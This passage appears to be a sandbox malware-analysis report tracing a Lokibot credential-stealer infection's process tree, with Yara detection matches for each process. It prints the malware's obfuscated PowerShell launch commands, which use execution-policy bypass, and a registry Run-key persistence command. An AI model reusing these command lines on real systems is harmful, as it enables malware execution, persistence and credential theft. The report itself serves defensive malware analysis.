                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        Analysis Process: powershell.exe PID: 2324 Parent PID: 2468

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        Analysis Process: 12.exe PID: 2800 Parent PID: 2324

                                                                                        General

                                                                                        Start time:19:05:08
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        Imagebase:0x12a0000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low

                                                                                        Analysis Process: cmd.exe PID: 2244 Parent PID: 2800

                                                                                        General

                                                                                        Start time:19:05:11
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0x4a4c0000
                                                                                        File size:302592 bytes
                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Analysis Process: reg.exe PID: 1664 Parent PID: 2244

                                                                                        General

                                                                                        Start time:19:05:11
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0x8f0000
                                                                                        File size:62464 bytes
                                                                                        MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Analysis Process: ntrwe.exe PID: 1916 Parent PID: 2800

                                                                                        General

                                                                                        Start time:19:05:22
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\ntrwe.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0xe90000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        Reputation:low

                                                                                        Analysis Process: ntrwe.exe PID: 2996 Parent PID: 1388

                                                                                        General

                                                                                        Start time:19:05:23
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\ntrwe.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0xe90000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:low

                                                                                        Analysis Process: RegAsm.exe PID: 2192 Parent PID: 1916

                                                                                        General

                                                                                        Start time:19:05:24
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Imagebase:0x250000
                                                                                        File size:64672 bytes
                                                                                        MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Loki_1, Description: Loki Payload, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, Metadefender, Browse
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:moderate

                                                                                        Analysis Process: ntrwe.exe PID: 2292 Parent PID: 1388

                                                                                        General

                                                                                        Start time:19:05:31
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\ntrwe.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\ntrwe.exe'
                                                                                        Imagebase:0xe90000
                                                                                        File size:938440 bytes
                                                                                        MD5 hash:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low

                                                                                        Analysis Process: RegAsm.exe PID: 2844 Parent PID: 2292

                                                                                        General

                                                                                        Start time:19:05:33
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Imagebase:0x1230000
                                                                                        File size:64672 bytes
                                                                                        MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Loki_1, Description: Loki Payload, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:moderate

                                                                                        Disassembly

                                                                                        Code Analysis

                                                                                        Reset < >